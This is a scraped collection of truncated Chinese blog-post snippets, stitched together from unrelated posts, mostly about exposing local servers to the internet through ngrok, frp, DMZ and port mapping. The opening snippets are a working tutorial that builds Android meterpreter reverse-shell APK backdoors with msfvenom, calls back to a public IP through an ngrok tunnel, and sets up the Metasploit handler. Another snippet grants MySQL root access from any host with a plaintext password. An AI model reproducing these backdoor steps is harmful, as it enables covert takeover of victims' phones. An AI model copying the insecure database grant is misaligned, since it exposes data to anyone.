创建个通道./ngrok tcp 1113 msfvenom -p android/meterpreter/reverse_tcp LHOST=52.15.62.13 LPORT=17016 R > ttxd.apk 现在我把这个apk导入到手机上然后运行 我们来运行 exploit 可以看到我们已经成功拿到meterperter了现在可以为所欲为了…

1,内网木马 先生成一个小马 msfpayload -p android/meterpreter/reverse_tcp LHOST=192.168.8.104 LPORT=5555 R > android_backdoor.apk ip填写自己的内网ip ,端口自定 启动  msfconsole 依次输入下面的命令 use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.8.…

这周看了demon哥的博客弄msf外网马,自己试了一下 首先去ngrok官网下载对应的系统版本,如果对应下载那个标签是绿色的(这里不支持windows) 下载好后在linux提取出来 让我们来看看他的帮助 输入./ngrok -h 现在我们去ngrok注册一个账号,我已经注册了,注册完等录后 在终端输入./ngrok authtoken 你的凭证 然后他会给出一个链接 点开链接,把你的凭证下载出来.   注:如果报错把\\\去掉一条\ 下载完后我们就可以建立连接了,我们来试一下./ngrok t…

手机APP应用外网访问本地WEB应用 本地安装了WEB服务端,手机APP应用只能在局域网内访问本地WEB,怎样使手机APP应用从公网也能访问本地WEB? 本文将介绍具体的实现步骤. 1. 准备工作 1.1 安装并启动WEB服务端程序 默认安装的WEB服务端的端口是80. 2. 实现步骤 2.1 下载并解压holer软件包 Holer软件包:holer-xxx.tar.gz Holer支持各种OS系统平台,请选择跟本地OS类型匹配的holer软件包. 2.2 获取holer access key信…

现在这段时间是全员 hw 时期,刚好前几天也有幸参与了某个地方的 hw 行动,作为攻击方,这里就简单总结一下最近挖洞的思路吧.因为可能怕涉及到敏感的东西,这里就有的地方不会细说了. 因为本人比较菜,所以只能做一点比较基础的总结,大佬们请忽略吧…渗透的大体过程 整个渗透测试的流程就是通过信息收,集到外网的 web 漏洞挖掘,来获取一个 webshell ,通过这个 shell 进一步利用来打进内网,进行内网渗透.域渗透,最终获取域控权限的一个过程. 从外网挖掘漏洞的一些方法 常见的渗透思路这里就不…

笔者学习了一下用爬虫, 获取登录者的外网IP. 首先导入Jsoup的jar包 public class RetrivePage { private static String url="http://www.ip.cn/"; /** 连接网站,模拟浏览器登陆,避免网站识别为手机进入 */ private static final String USERAGENT = "Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 F…

公司有个mysql的数据库放在221服务器上,做手机app数据库连接的时候,本地调试没问题,一旦更新到外网142手机服务器(220.230.190.142),就是数据库连接超时.想到可能是mysql没设置142访问的权限. 1.设置任意主机以root账号以root111密码进行连接 GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root111' WITH GRANT OPTION; flush privileges; 设置完发现…

单位有3个域名,用量很大,2014年开始本人研究部署了Bind+DLZ +Mysql的三机智能多链路DNS,非常好用,优点是: 1.使用Mysql管理记录,配置.管理.查询方便. 2.自动判断运营商,返回指定IP,实现智能多链路.目前我们单位有电信.移动.教育网专线和固定IP,通过Bind的View,判断请求源IP自动返回对应运营商的服务IP.很好很强大也很实用. 3.根据配置自动为内网分配对应的运营商解析...我单位内网用户较多,有一个不少见的需求,内网部分用户要使用电信专线.部分用户要使用移…

<目前百度谷歌上都木有我这么完整的笔记,虽然各个部分都是来自百度的,然后自己实践,自己做截图笔记,嘻嘻 Made By HeYang> 环境:Windows 7 工具:JDK,Apache tomcat,花生壳 客户端 网站建设技术:JSP <建议:之后需要用的JSP的开发工具Eclipse都不要建立在中文路径下> 1.首先下载然后安装JDK,安装JDK的方法,包括配置环境变量,百度搜索就会有,这是学习Java的基础,以及简单利用终端测试安装是否成功,此处就不多累述. 2.下载然后…

背景:听哥们说了个工具ngrok,可以让本机配置的web服务在外网访问,抱着将信将疑的态度试了试,发现还真的可以.下面记录下我自己的安装步骤,另外谈下自己还有些疑问的地方. 参考资料网站:http://blog.csdn.net/liuxiyangyang/article/details/22922265 一.首先访问官网,https://ngrok.com/  注册一个账号(注册后才能获取自己的一个账号秘钥用于进行后面的绑定操作). 二.注册完成后,在跳转后的页面不用理会支付模块,可以看到自己…

最近做一个小东西,大概过程就是想在教室,宿舍控制实验室的一些设备. 已经在树莓上搭了一个轻量的flask服务器,在实验室的路由器下,任何设备都是可以访问的:但是有一些限制条件,比如我想在宿舍控制我种花的光照然后就不行了: 所以这是一个外网访问内网的梗,解决方案如下: 1.先在本地term命令下查看ifconfig(windows为ifconfig):找到自己的本机ip,我的树莓派被分配ip为192.168.1.103 2.tplink路由器的管理地址是192.168.1.1 在浏览器中输入192…

让本地服务器可以在外网访问的方式有很多,介绍其中一种: 由于本人是在自己电脑上装了一个虚拟机, 测试环境为:虚拟机作为服务器,服务器中装了一个禅道,虚拟机IP192.168.2.221,本人通过tplink路由器上网 1 查看路由器的外网IP 2 然后将物理机的端口映射给虚拟机对应的端口 3 然后在外网访问物理机对应的端口(我在防火墙开放的是443),就会显示出虚拟机内部的web应用了 例如:我的外网IP为211.125.111.211,那么我用手机流量访问211.125.111.211:443…

前两天阿里云ECS搞活动,所有买了个三年的Ecs,然后照着之前在虚拟机同样的搭建服务器,一切都很正常,可是 当我配置好防火墙和nginx之后,发现个问题,外网无法访问. 思考: 1.我的nginx没配置好,通过curl http://localhost 命令一看,没问题,页面内容能正常出来 2.我的防火墙的端口配置有问题,然后firewalld  跟iptables一通乱来,添加80端口,后面网上看到有人说Ecs没备案 的80端口不回开放,于是我换了个8000端口,同样还是不行,没办法,继续折腾…

最近的工作中,遇到了一个需求:对于无APP登陆权限的人员,提供拍照上传功能,以便生成更完善的出工记录.经研究讨论,决定实现的机制为:由合法的人员登陆APP认领相关工作任务,并生成当天当工作的唯一二维码,无APP登陆权限的人员扫描二维码,使用H5页面进行自拍,完善出工记录.我负责了H5拍照及拍照信息保存部分.该部分工作独立性较强,其中也有许多难点的解决过程值得记录.所以写了这篇文章记录,并且在github中写了一个demo.希望能帮助到有需要的人. 一:环境配置 简介:该demo前端使用h5+jq…

本地内网IP和外网IP的区别: 根据我的经验一台电脑需要两个ip才可以上网,一个是本地的内网ip 一个是外网的ip 本地的ip 一般是192.168.1.2这种样子  只要在不同的路由器上可以重复 外网ip 可就不一样了全世界没有相同的 可以说每人一个 ① ② ③ ④ ⑤ 一.获得本地IP地址 获得本地IP地址有两种情况:一是wifi下,二是移动网络下 ①wifi下 需要添加的权限: <uses-permission android:name="android.permission.ACC…

方法1:使用 MDZ (  demilitarized zone), 中文意思 非武装的区域.我们的家用电脑一般都在 路由器所在的 C类内网(192.X.X.X 的 ip).外网是不能直接访问内网的.这里的整个内网被"武装了",别人看不见.MDZ 做的就是 吧一台机子 暴露出去,非武装. 能使用MDZ 的前提.你家的宽带有一个 外网ip(没有的打电话找运营商要).我的的联通宽带正好有外网ip.  100,172,192 开头的都是  分别对应三种内网ip. 第一步:打开路由器管理界面.…

描述:假如已连外网,具备一台路由器的情况下在路由器设置页面配置花生壳动态域名解析,使得外网可以访问到本地iis 托管的web服务,模拟真实环境调试应用程序. 网络运营商ip的动态分配,通常网络提供商给我们提供的网络服务都是动态分配ip,每次重启路由器或者手动直接手动拨号都将导致ip的重新分配,这样的话即使有一个对外的ip,也不能固定使用同一ip访问本地服务: ip138.com可以查询到当前使用的外网ip,假如iis上发布了web服务,并在防火墙设置了特定iis服务访问端口可以访问,其他用户通过…

环境: 校园宿舍, 10.x.x.x 和 172.16.x.x~172.31.x.x是校园内网,本科教务系统什么的都在上边 路由器: 路由器1(校园内网):水星MR807 路由器2(拨号上网):TP Link WR740R 达成目标: 宿舍成员通过路由器2正常访问校园外网,同时,可以正常访问校园内网. 操作步骤: 一.配置路由器1(校园内网) 1. 修改路由器地址从192.168.1.1到192.168.1.2: 登录192.168.1.1 -- 网络配置 -- LAN -- IP地址 -- 输…

公司禁网(也不是完全禁,能连接外网数据库,不能下载东西,不能打开网页,但是却能打开谷歌的收索页面,只是不能点进网页) 发现linux主机再用代理上网的情况下不能用wget从外网下载资源,但是却可以从内网下载资源,弄了我一个多小时,擦.…

今天弄了下Ubuntu的服务器,配置了一个LAMP环境的服务器,配置有时间我再来说 但是配置了很长的时间,差不都怕是好几个小时 在配置apache的时候,出现了问题,好不容易把apache服务配置好 但是只能用在Ubuntu里访问那个具有标志性的网页,It works ! 在ubuntu 服务器里我是这样访问的 首先,查看服务器的内网IP 然后用elinks 命令 elinks http://172.17.45.112 然后我又在我的电脑里面用外网访问,但是一直是不可以的,我一直查资料,但是就是…

一个win7本本仅通过一个无线路由一个人上网,突然一天不能上网了,甚是奇怪,一看本地连接均是正常的.而且能ping通外网的dns,但无论如何就是打不开网页,表现为输入任何网址很迅速的显示该页无法显示,好像浏览器并没有提交任何url就做出了反应一样.其它客户端诸如QQ,迅雷等都一样不能访问因特网. 分析,由于能ping通外网,并且是自动从路由获得的ip,子网,网关,dns信息,所以可以肯定的是路由肯定是没有问题的,把dns手动更换为8.8.8.8也无济于事.由此可断问题,肯定出现在本机上. 这个现…

Sharepoint配置完成了,projectserver也已经配置完毕.突然遇到一个情况就是外网访问不了,这可麻烦了,费了半天事访问不了等于0啊.没办法,研究吧.在群里问了大神,终于解决了.现将解决办法以及原理说一下,或许原理不一定对,这是我理解的,姑且听之吧: 首先,你得有一个公网IP,否则,你只能采用VPN的方式来做,简单的办法花生壳等要收费.麻烦的需要下载开源软件,需要配置,网上有很多文章可以看看.但是非常非常麻烦,如果不了解,大家请做好拿出时间慢慢搞得准备,最好弄个虚拟机慢慢做. 拥有…

一.准备工作 (1)有一台属于自己的云服务器,并成功部署和发布一个web项目(当然,本质上来说Java-Project也没问题),通过外网IP可以正常访问该web项目. 需要说明的是:任何web项目,只要成功部署后在外网上能访问到即可.本案例注重修改web对请求的监听和过滤的处理(下个版本在弄这个啦!). (2)本地新建Java-project,需要准备一些jar包,比如:AES加密相关的包,BASE64加相关的包,解析XML的包,至于通信相关的类,JDK的java.io和java.net自带.…

前言 决心要花费宝贵时间写下这篇心得,是因为从昨天晚上到今天上午被这个VMWare模拟搭建的服务器集群不能上外网的问题搞得很心烦,最后决定跟它杠上了!上午还通过远程连接得到了“空白”同学的帮助,在此表示十分感谢.虽然到今天中午的时候经过帮助能上外网了,但是自己感觉还是没有彻底弄懂,对三种模式下的网络结构还是一知半解,上网查了很多资料,但是发现网上很多文章有许多误导.于是自己又从VMWare的三种模式出发,查资料,最后终于算是捋顺了. 写下这篇文章,一是让自己的逻辑得到锻炼,二是希望能帮到部分同学…

实例: 在数据中心机房的一台服务器上安装虚拟机,并在该虚拟机上安装一个操作系统.给该虚拟机配置公网IP,让外网能直接访问到该虚拟上的应用. 这个问题最初觉得简单,不就是桥接嘛,要只让其上网NAT就可以啊.但当服务器有2块网卡的时候,就可能会出问题. 但试了好几次都没成功,然后放着懒得弄了.今天早上一来看了下虚拟机的设置参数,终于找出了原因所在. 特此写出来帮碰到此问题的朋友. 解决办法: 1.查看真实机的网卡设备名称,看哪块网卡是连接wan的.(我的#2是连接外网的网卡) 2.编辑虚拟机的虚拟虚…

  很多时候我们轻易地把Web服务器暴露在公网上,查看一下访问日志,可以看到会收到大量的攻击请求,这个是网站开通后几个小时收到的请求: 1.  探测服务器信息 在上线一分钟,收到OPTION请求探测. 现在他已经知道我用的是Apache, 操作系统是CentOS,可以开展针对性的进攻了. Tips:您问怎么把Apache信息藏起来?有书啊 2. 命令执行攻击 上线半小时,收到大量利用WEB服务器命令执行漏洞的攻击. 如果您的服务器使用的是ASP或者Structs2并且开启了调试模式(大部分服务上…

wampserver配置httpd.conf允许外网访问? 在电脑上开启wamp服务后,默认是禁止外部网络访问的,如果您想要同一局域网中的设备能够访问PC上的web项目,则需要对httpd.conf文件进行一些修改. 一.修改httpd.conf文件 1.httpd.conf文件在哪? 一般是在wamp安装目录的 bin\apache\apache2.4.23\conf\httpd.conf,例如:我的电脑wamp安装在D盘的wamp文件夹,则httpd.conf文件路径为D:\wamp\bin…

自我突破,在100+功能后,再做有质量的功能,非常不易,相对录制视频这些轻松活,还是按捺不住去写代码,此功能虽小,但功课也做了不少,希望对真正有需要的群体带来一些惊喜. 背景介绍 图床的使用,一般是写博客之类的需求,特别是Markdown写作风格的,将图片上传到网络上,才能够在这些文章中展现. 单单满足这样的需求,其实没有太大必要性在Excel上操作,市面上大量基于浏览器.系统层面的插件操作友好度更佳. 需要批量操作的场景,可能更多地落在数据分析群体里,如分析商品的畅滞销分析,需要拿到图片来做展…

当你在VMware Workstation Pro中,打开从别人那里克隆来的系统,或者是开启迁移后的虚拟机系统时,VMware将会提示你:此虚拟机可能已被移动或 复制.为了配置特定的管理和网络功能.VMware Workstation需要知道是否已移动或复制了此虚拟机.如果… ..          如果机器没有任何的提示就直接开机了,或者是你选择了“  我已复制该虚拟机(P) ”,那么说明System eth0在正常开机后可能是不能使用的.造成这个问题的关键之处在于,经过复制克隆.机器迁移后,…

只有信用卡大小的它,同时也是一台功能完备的电脑(树莓派),把内网能玩的功能都玩了个遍,自然就有了外网访问这台树莓派的需求.一样也是查阅了无数文章,研究了无数个方案,最终试验成功用FRP实现了内网穿透,实现在外网访问家里的这台raspbian系统. 下载 接下来到GitHub上下载frp的发行版本(https://github.com/fatedier/frp/releases).下载时看好对应的平台.ECS对应的是linux_amd64,树莓派对应的是linux_arm(最好别下arm64位的……